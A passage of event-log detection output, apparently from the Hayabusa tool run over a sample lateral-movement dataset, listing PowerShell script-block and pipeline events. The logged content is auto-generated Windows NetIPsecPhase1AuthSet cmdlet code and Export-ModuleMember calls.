[object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' -Alias '*' function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcess",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', 
${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias 
'*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.515 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.515 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.518 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.520 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.520 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.520 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.521 
+00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.523 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 